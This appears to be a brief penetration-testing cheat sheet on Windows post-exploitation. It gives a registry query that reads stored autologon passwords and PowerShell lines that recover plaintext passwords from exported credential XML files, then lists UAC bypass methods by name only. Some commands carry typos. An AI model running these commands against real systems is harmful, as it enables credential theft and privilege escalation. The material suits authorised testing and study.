Post Exploit Checks
Post Exploit
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>null | findstr "DefaultUserName DefaultDomainName DefaultPassword"netstat -anoPowershell
PSCredentials
# create a PSCredential object
$password = ConvertTo-SecureString "DNOscp1234!" -AsPainText -Force
$credential = New-Object System.Management.Automation.PSCredential("Dhanesh", $password)
# Export the credential to XML File
$credential | Export-CliXml -Path 'C:\Location'
# Import the xml file to obtain password
$file = Import-CliXml -Path "C:\Location\File.xml"
$file.GetNetworkCredential() | fl
# Extra
$file | Get-MemberMachine
Privilege Escalation
UAC

UAC Bypass
1. Mounting

2. DLL Hijacking
3. Akagi

4. FileLess UAC Bypass
Commands
Last updated
